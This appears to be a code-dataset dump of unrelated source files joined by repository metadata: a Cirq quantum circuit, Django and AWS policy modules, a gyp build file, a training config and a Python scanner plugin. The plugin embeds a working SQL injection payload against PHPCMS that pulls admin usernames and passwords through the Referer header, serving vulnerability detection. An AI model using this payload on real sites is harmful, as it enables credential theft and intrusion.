cirq.GridQubit(5, 3), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.4593314109380113, phi=0.5230636172671492).on(
cirq.GridQubit(5, 5), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -12.410072351850753).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 12.468621852670255).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 26.656199817881895).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -26.611019617243198).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -12.422336273583753).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 12.376024275975672).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 24.032508849527318).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -23.993220632379824).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -5.991658529535789).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 6.094768068552847).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -9.293307215154037).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * 9.006468621589612).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
(cirq.X ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 5)
),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 4)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -13.046692838556257).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 13.107006443219033).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -20.486755870544844).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 20.51325689904871).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -19.82814477311278).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 19.838469153514826).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * 17.687652291347487).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -17.230577602838448).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.589821065740506, phi=0.5045391214115686).on(
cirq.GridQubit(4, 3), cirq.GridQubit(5, 3)
),
cirq.FSimGate(theta=1.5472406430590444, phi=0.5216932173558055).on(
cirq.GridQubit(4, 4), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.5124128267683938, phi=0.5133142626030278).on(
cirq.GridQubit(4, 5), cirq.GridQubit(5, 5)
),
cirq.FSimGate(theta=1.5707871303628709, phi=0.5176678491729374).on(
cirq.GridQubit(4, 6), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 12.71050872566315).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -12.650195121000372).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 19.562531408750814).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -19.53603038024695).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 18.69447149644039).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -18.684147116038343).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * -18.21701654221441).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 18.674091230723448).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 5)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 39.34359792383697).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -39.42696290791402).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 38.52825306393881).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -38.452584830758425).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 12.958562501914345).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -13.049596611893888).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 15.428639843256777).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -15.42731467518594).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.4668587973263782, phi=0.4976074601121169).on(
cirq.GridQubit(3, 3), cirq.GridQubit(4, 3)
),
cirq.FSimGate(theta=1.47511091993527, phi=0.538612093835262).on(
cirq.GridQubit(3, 4), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.603651215218248, phi=0.46649538437100246).on(
cirq.GridQubit(3, 5), cirq.GridQubit(4, 5)
),
cirq.FSimGate(theta=1.6160334279232749, phi=0.4353897326147861).on(
cirq.GridQubit(3, 6), cirq.GridQubit(4, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -39.11725021952874).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 39.03388523545169).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -37.65488974563269).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 37.730557978813074).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -14.665863640797525).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 14.574829530817984).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -16.519871460773594).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 16.52119662884443).on(cirq.GridQubit(4, 6)),
]
),
cirq.Moment(
operations=[
(cirq.X ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 5)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 6)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 3)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 14.928737337703097).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -14.836929415695444).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -12.10125113388289).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 12.22245467467503).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -10.099134633961603).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 10.172407045184396).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.5862983338115253, phi=0.5200148508319427).on(
cirq.GridQubit(3, 4), cirq.GridQubit(3, 5)
),
cirq.FSimGate(theta=1.5289739216684795, phi=0.5055240639761313).on(
cirq.GridQubit(4, 4), cirq.GridQubit(4, 5)
),
cirq.FSimGate(theta=1.5346175385256955, phi=0.5131039467233695).on(
cirq.GridQubit(5, 4), cirq.GridQubit(5, 5)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -15.32421457749417).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 15.416022499501823).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 11.899075778124569).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -11.777872237332431).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 9.817341949396608).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -9.744069538173814).on(cirq.GridQubit(5, 5)),
]
),
cirq.Moment(
operations=[
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 3)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 4)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 5)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 6)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 5)),
(cirq.Y ** 0.5).on(cirq.GridQubit(4, 6)),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 3)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 4)
),
(cirq.Y ** 0.5).on(cirq.GridQubit(5, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * 17.629359127188117).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * -17.570809626368614).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * -36.89270806725978).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * 36.93788826789848).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * 16.787954522971983).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * -16.834266520580062).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * -33.970047663366486).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * 34.00933588051398).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * 7.441137480344476).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * -7.338027941327417).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * 12.963573798570843).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * -13.250412392135269).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
cirq.FSimGate(theta=1.2947043217999283, phi=0.4859467238431821).on(
cirq.GridQubit(3, 3), cirq.GridQubit(3, 4)
),
cirq.FSimGate(theta=1.541977006124425, phi=0.6073798124875975).on(
cirq.GridQubit(3, 5), cirq.GridQubit(3, 6)
),
cirq.FSimGate(theta=1.5138652502397498, phi=0.47710618607286504).on(
cirq.GridQubit(4, 3), cirq.GridQubit(4, 4)
),
cirq.FSimGate(theta=1.5849169442855044, phi=0.54346233613361).on(
cirq.GridQubit(4, 5), cirq.GridQubit(4, 6)
),
cirq.FSimGate(theta=1.5398075246432927, phi=0.5174515645943538).on(
cirq.GridQubit(5, 3), cirq.GridQubit(5, 4)
),
cirq.FSimGate(theta=1.4593314109380113, phi=0.5230636172671492).on(
cirq.GridQubit(5, 5), cirq.GridQubit(5, 6)
),
]
),
cirq.Moment(
operations=[
cirq.rz(np.pi * -17.442072351850854).on(cirq.GridQubit(3, 3)),
cirq.rz(np.pi * 17.500621852670356).on(cirq.GridQubit(3, 4)),
cirq.rz(np.pi * 37.46019981788182).on(cirq.GridQubit(3, 5)),
cirq.rz(np.pi * -37.415019617243125).on(cirq.GridQubit(3, 6)),
cirq.rz(np.pi * -17.306336273583675).on(cirq.GridQubit(4, 3)),
cirq.rz(np.pi * 17.260024275975592).on(cirq.GridQubit(4, 4)),
cirq.rz(np.pi * 34.09650884952739).on(cirq.GridQubit(4, 5)),
cirq.rz(np.pi * -34.057220632379895).on(cirq.GridQubit(4, 6)),
cirq.rz(np.pi * -8.211658529535743).on(cirq.GridQubit(5, 3)),
cirq.rz(np.pi * 8.3147680685528).on(cirq.GridQubit(5, 4)),
cirq.rz(np.pi * -12.993307215153958).on(cirq.GridQubit(5, 5)),
cirq.rz(np.pi * 12.706468621589535).on(cirq.GridQubit(5, 6)),
]
),
cirq.Moment(
operations=[
(cirq.Y ** 0.5).on(cirq.GridQubit(3, 3)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 4)),
(cirq.X ** 0.5).on(cirq.GridQubit(3, 5)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(3, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(4, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 5)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(4, 6)
),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 3)
),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 4)),
cirq.PhasedXPowGate(phase_exponent=0.25, exponent=0.5).on(
cirq.GridQubit(5, 5)
),
(cirq.X ** 0.5).on(cirq.GridQubit(5, 6)),
]
),
]
)
| [
"[email protected]"
]
| |
64f97e236d713e1627d64ec3e03f6c532a3d2e76 | 0f0af12b45aa6f50fb418f9236fc622e56bbbfee | /server/podbaby/history/serializers.py | 783c7dba88c4eec2024b18765cff0ede0b0e6e8b | []
| no_license | danjac/podbaby2 | 234863e5d2ad39902bc64e63e285e7b507049727 | 17f02b0707120797cb3c3cccb95dacddff6375fa | refs/heads/master | 2020-09-24T23:11:08.186829 | 2016-12-03T07:42:59 | 2016-12-03T07:42:59 | 66,766,438 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 238 | py | from rest_framework import serializers
from history.models import Play
class PlaySerializer(serializers.ModelSerializer):
class Meta:
model = Play
fields = (
'episode',
'created',
)
| [
"[email protected]"
]
| |
fc019e03a0ec2faaedaaf366a1c30c010b4fbc68 | 97fcd33403e69e7e5bb60d27b7de73bb7c58b060 | /awacs/applicationinsights.py | 0d90c4b4f0fe2b10f6a8ea40d350fb33b7c02a67 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-2-Clause"
]
| permissive | isabella232/awacs | d2b132b527da6b6c2e89da26e9fdbc1d5ca7f191 | 41a131637c16a6912c17f92ac3bbf2a3bf978631 | refs/heads/master | 2023-01-09T07:45:22.199974 | 2020-11-16T05:11:01 | 2020-11-16T05:11:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,536 | py | # Copyright (c) 2012-2013, Mark Peek <[email protected]>
# All rights reserved.
#
# See LICENSE file for full license.
from aws import Action as BaseAction
from aws import BaseARN
service_name = 'CloudWatch Application Insights'
prefix = 'applicationinsights'
class Action(BaseAction):
def __init__(self, action=None):
sup = super(Action, self)
sup.__init__(prefix, action)
class ARN(BaseARN):
def __init__(self, resource='', region='', account=''):
sup = super(ARN, self)
sup.__init__(service=prefix, resource=resource, region=region,
account=account)
CreateApplication = Action('CreateApplication')
CreateComponent = Action('CreateComponent')
DeleteApplication = Action('DeleteApplication')
DeleteComponent = Action('DeleteComponent')
DescribeApplication = Action('DescribeApplication')
DescribeComponent = Action('DescribeComponent')
DescribeComponentConfiguration = Action('DescribeComponentConfiguration')
DescribeComponentConfigurationRecommendation = \
Action('DescribeComponentConfigurationRecommendation')
DescribeObservation = Action('DescribeObservation')
DescribeProblem = Action('DescribeProblem')
DescribeProblemObservations = Action('DescribeProblemObservations')
ListApplications = Action('ListApplications')
ListComponents = Action('ListComponents')
ListProblems = Action('ListProblems')
UpdateApplication = Action('UpdateApplication')
UpdateComponent = Action('UpdateComponent')
UpdateComponentConfiguration = Action('UpdateComponentConfiguration')
| [
"[email protected]"
]
| |
8df96bdca93c8ac21e2f1bbfaf44925c191e836e | e7e497b20442a4220296dea1550091a457df5a38 | /main_project/release-gyp/user/user_cache.gyp | 8ad0946152bb7f37f49b7e30cfb8de571639ce27 | []
| no_license | gunner14/old_rr_code | cf17a2dedf8dfcdcf441d49139adaadc770c0eea | bb047dc88fa7243ded61d840af0f8bad22d68dee | refs/heads/master | 2021-01-17T18:23:28.154228 | 2013-12-02T23:45:33 | 2013-12-02T23:45:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,361 | gyp | {
#包含公共设置
'includes':[
'user_common.gyp',
],
'variables':{
'service_name' : 'UserCache',
'service_src_path' : '<(main_project_path)/user/<(service_name)/',
},
'target_defaults' : {
'include_dirs' : [
'/usr/local/distcache-dev/include',
'/usr/local/distcache-util/include/',
'/usr/local/distcache/include/',
'<(main_project_path)/tripod-new/src/cpp/include',
'<(main_project_path)/TalkUtil/src',
'<(main_project_path)/third-party/include/',
'<(main_project_path)/third-party/apr/include/apr-1',
'<(main_project_path)/third-party/libactivemq/include/activemq-cpp-3.4.1',
'<(main_project_path)/third-party/redis-c-driver/',
'<(main_project_path)/message_pipe/src/cpp/',
],
'link_settings' : {
'libraries' : [
'-L../third-party/libactivemq/lib',
'-lactivemq-cpp',
#只用xce-dev或third-party的任一个都有问题,
'-L../third-party/apr/lib',
'-L/usr/local/xce-dev/lib64',
'-lapr-1', '-laprutil-1',
'-L/usr/local/distcache-util/lib',
'-lrdc-client',
],
'ldflags': [
'-Wl,-rpath /usr/local/xce-dev/lib64',
'-Wl,-rpath /usr/lib64',
],
},
},
'targets' : [
######################################################
{
'target_name' : 'DistUserCacheReloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/dist/reloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : '<(service_name)',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/src -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCacheAgent',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/agent -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCacheReloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/reloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : 'UserCachePreloader',
#'type' : 'executable',
'type' : '<(target_mode)',
'sources' : [
'<!@(find <(service_src_path)/preloader -name "*.cpp")',
],
'dependencies' : [
'./user_slice_and_adapter.gyp:*',
],
},
######################################################
{
'target_name' : '<(service_name)Test',
'type' : 'executable',
'dependencies' : [
'../gtest.gyp:gtest',
'../gtest.gyp:gtest_main',
'./user_slice_and_adapter.gyp:*'
# '../3rdparty.gyp:hiredis',
# '../base.gyp:base',
# '../xce_base.gyp:xce_base',
#'../tripod2.gyp:tripod_core',
],
'sources' : [
],
},
] #end targets
}
| [
"[email protected]"
]
| |
6d53bd2ad8620c52fba55ab8bda20744ee97b8a0 | dbe1f4110921a08cb13e22ea325d503bd5627195 | /chuhuo_2.7_clickhouse/bluedon/bdwafd/newscantools/plugins/Phpcms_post_clickSqlInjectionScript.py | 1001b1ccc85c453fcecb86d7c9553f38992ae182 | []
| no_license | Hehouhua/waf_branches | 92dc1b1cbecba20f24ef6c7372dde7caa43f9158 | ca76f3a1ed8150b423474c9e37aee37841a5ee35 | refs/heads/main | 2023-01-07T11:33:31.667688 | 2020-11-03T06:58:33 | 2020-11-03T06:58:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,626 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from lib.common import *
def run_domain(http,ob):
list = []
try:
domain = ob['domain']
detail = u''
url = "%s://%s%s" % (ob['scheme'],ob['domain'],ob['base_path'])
expurl="%s%s"%(url,"index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2")
data=""
headers = {"User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5","Accept": "text/plain","Referer": "1',(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x4E56535F54455354,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),'1')#"}
#res, content = http.request(expurl,"POST",data,headers)
res, content = yx_httplib2_request(http,expurl,"POST",data,headers)
#print content
if content.find('NVS_TEST')>=0:
#print ">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>"
request = postRequest(expurl,"POST",headers,)
response = getResponse(res)
list.append(getRecord(ob,ob['scheme']+"://"+ob['domain'],ob['level'],detail,request,response))
except Exception,e:
logging.getLogger().error("File:phpcms_post_click.py, run_domain function :" + str(e) + ",task id:" + ob['task_id'] + ",domain id:" + ob['domain_id'])
write_scan_log(ob['task_id'],ob['domain_id'],"File:phpcms_post_click.py, run_domain function :" + str(e))
#end try
return list
#end def | [
"[email protected]"
]
| |
cc7c313990a752b0eea8829bbf89e10a65814597 | 06671e14ae54f887be05a64c632712537d38add6 | /integration_distributed_training/config_files/helios/13_repeat20x031/config_00166.py | e23ff123e7c6311a920a8756d990f5e9c1cc62bb | []
| no_license | Jessilee/ImportanceSamplingSGD | cf74a220a55b468b72fed0538b3a6740f532fcb2 | 0831b9b1833726391a20594d2b2f64f80e1b8fe2 | refs/heads/master | 2021-01-24T10:12:48.285641 | 2016-02-05T19:25:34 | 2016-02-05T19:25:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,175 | py | import numpy as np
import os
def get_model_config():
model_config = {}
#Importance sampling or vanilla sgd.
model_config["importance_algorithm"] = "isgd"
#model_config["importance_algorithm"] = "sgd"
#Momentum rate, where 0.0 corresponds to not using momentum
model_config["momentum_rate"] = 0.95
#The learning rate to use on the gradient averaged over a minibatch
model_config["learning_rate"] = 0.01
#config["dataset"] = "mnist"
model_config["dataset"] = "svhn"
#config["dataset"] = "kaldi-i84"
if model_config["dataset"] == "mnist":
print "Error. Missing values of (Ntrain, Nvalid, Ntest)"
quit()
model_config["num_input"] = 784
model_config["num_output"] = 10
elif model_config["dataset"] == "svhn":
(Ntrain, Nvalid, Ntest) = (574168, 30220, 26032)
model_config["num_input"] = 3072
model_config["num_output"] = 10
model_config["normalize_data"] = True
elif model_config["dataset"] == "kaldi-i84":
(Ntrain, Nvalid, Ntest) = (5436921, 389077, 253204)
model_config["num_input"] = 861
model_config["num_output"] = 3472
model_config["normalize_data"] = False
model_config['Ntrain'] = Ntrain
model_config['Nvalid'] = Nvalid
model_config['Ntest'] = Ntest
# Pick one, depending where you run this.
# This could be done differently too by looking at fuelrc
# or at the hostname.
#import socket
#data_root = { "serendib":"/home/dpln/data/data_lisa_data",
# "lambda":"/home/gyomalin/ML/data_lisa_data",
# "szkmbp":"/Users/gyomalin/Documents/fuel_data"}[socket.gethostname().lower()]
data_root = "/rap/jvb-000-aa/data/alaingui"
model_config["mnist_file"] = os.path.join(data_root, "mnist/mnist.pkl.gz")
model_config["svhn_file_train"] = os.path.join(data_root, "svhn/train_32x32.mat")
model_config["svhn_file_extra"] = os.path.join(data_root, "svhn/extra_32x32.mat")
model_config["svhn_file_test"] = os.path.join(data_root, "svhn/test_32x32.mat")
model_config["kaldi-i84_file_train"] = os.path.join(data_root, "kaldi/i84_train.gz")
model_config["kaldi-i84_file_valid"] = os.path.join(data_root, "kaldi/i84_valid.gz")
model_config["kaldi-i84_file_test"] = os.path.join(data_root, "kaldi/i84_test.gz")
model_config["load_svhn_normalization_from_file"] = True
model_config["save_svhn_normalization_to_file"] = False
model_config["svhn_normalization_value_file"] = os.path.join(data_root, "svhn/svhn_normalization_values.pkl")
model_config["hidden_sizes"] = [2048, 2048, 2048, 2048]
# Note from Guillaume : I'm not fond at all of using seeds,
# but here it is used ONLY for the initial partitioning into train/valid.
model_config["seed"] = 9999494
#Weights are initialized to N(0,1) * initial_weight_size
model_config["initial_weight_size"] = 0.01
#Hold this fraction of the instances in the validation dataset
model_config["fraction_validation"] = 0.05
model_config["master_routine"] = ["sync_params"] + ["refresh_importance_weights"] + (["process_minibatch"] * 32)
model_config["worker_routine"] = ["sync_params"] + (["process_minibatch"] * 10)
model_config["turn_off_importance_sampling"] = False
assert model_config['Ntrain'] is not None and 0 < model_config['Ntrain']
assert model_config['Nvalid'] is not None
assert model_config['Ntest'] is not None
return model_config
def get_database_config():
# Try to connect to the database for at least 10 minutes before giving up.
# When setting this to below 1 minute on Helios, the workers would give up
# way to easily. This value also controls how much time the workers will
# be willing to wait for the parameters to be present on the server.
connection_setup_timeout = 10*60
# Pick one, depending where you run this.
# This could be done differently too by looking at fuelrc
# or at the hostname.
#import socket
#experiment_root_dir = { "serendib":"/home/dpln/tmp",
# "lambda":"/home/gyomalin/ML/tmp",
# "szkmbp":"/Users/gyomalin/tmp"}[socket.gethostname().lower()]
experiment_root_dir = "/rap/jvb-000-aa/data/alaingui/experiments_ISGD/00166"
redis_rdb_path_plus_filename = os.path.join(experiment_root_dir, "00166.rdb")
logging_folder = experiment_root_dir
want_rdb_background_save = True
# This is part of a discussion about when we should the master
# start its training with uniform sampling SGD and when it should
# perform importance sampling SGD.
# The default value is set to np.Nan, and right now the criterion
# to decide if a weight is usable is to check if it's not np.Nan.
#
# We can decide to add other options later to include the staleness
# of the importance weights, or other simular criterion, to define
# what constitutes a "usable" value.
default_importance_weight = np.NaN
#default_importance_weight = 1.0
want_master_to_do_USGD_when_ISGD_is_not_possible = True
master_usable_importance_weights_threshold_to_ISGD = 0.1 # cannot be None
# The master will only consider importance weights which were updated this number of seconds ago.
staleness_threshold_seconds = 20
staleness_threshold_num_minibatches_master_processed = None
# Guillaume is not so fond of this approach.
importance_weight_additive_constant = 10.0
serialized_parameters_format ="opaque_string"
# These two values don't have to be the same.
# It might be possible that the master runs on a GPU
# and the workers run on CPUs just to try stuff out.
workers_minibatch_size = 2048
master_minibatch_size = 128
# This is not really being used anywhere.
# We should consider deleting it after making sure that it
# indeed is not being used, but then we could argue that it
# would be a good idea to use that name to automatically determine
# the values of (Ntrain, Nvalid, Ntest).
dataset_name='svhn'
L_measurements=["individual_importance_weight", "individual_gradient_square_norm", "individual_loss", "individual_accuracy", "minibatch_gradient_mean_square_norm"]
L_segments = ["train", "valid", "test"]
#
# The rest of this code is just checks and quantities generated automatically.
#
assert workers_minibatch_size is not None and 0 < workers_minibatch_size
assert master_minibatch_size is not None and 0 < master_minibatch_size
assert dataset_name is not None
assert serialized_parameters_format in ["opaque_string", "ndarray_float32_tostring"]
assert 0.0 <= master_usable_importance_weights_threshold_to_ISGD
assert master_usable_importance_weights_threshold_to_ISGD <= 1.0
return dict(connection_setup_timeout=connection_setup_timeout,
workers_minibatch_size=workers_minibatch_size,
master_minibatch_size=master_minibatch_size,
dataset_name=dataset_name,
L_measurements=L_measurements,
L_segments=L_segments,
want_only_indices_for_master=True,
want_exclude_partial_minibatch=True,
serialized_parameters_format=serialized_parameters_format,
default_importance_weight=default_importance_weight,
want_master_to_do_USGD_when_ISGD_is_not_possible=want_master_to_do_USGD_when_ISGD_is_not_possible,
master_usable_importance_weights_threshold_to_ISGD=master_usable_importance_weights_threshold_to_ISGD,
staleness_threshold_seconds=staleness_threshold_seconds,
staleness_threshold_num_minibatches_master_processed=staleness_threshold_num_minibatches_master_processed,
importance_weight_additive_constant=importance_weight_additive_constant,
logging_folder=logging_folder,
redis_rdb_path_plus_filename=redis_rdb_path_plus_filename,
want_rdb_background_save=want_rdb_background_save)
def get_helios_config():
# Optional.
return {}
| [
"[email protected]"
]
| |
8c9cac2973d6978608f4768621bb61a098589c65 | 8316b326d035266d41875a72defdf7e958717d0a | /Regression/Poly_linear_regression_boston_house_predict.py | 465a1cccc33d4b05fe7f9a57daa1fb6da7a7de61 | []
| no_license | MrFiona/MachineLearning | 617387592b51f38e59de64c090f943ecee48bf1a | 7cb49b8d86abfda3bd8b4b187ce03faa69e6302d | refs/heads/master | 2021-05-06T17:18:49.864855 | 2018-01-24T15:29:36 | 2018-01-24T15:29:36 | 111,804,323 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,783 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Time : 2017-11-28 15:22
# Author : MrFiona
# File : Poly_linear_regression_boston_house_predict.py
# Software: PyCharm Community Edition
import warnings
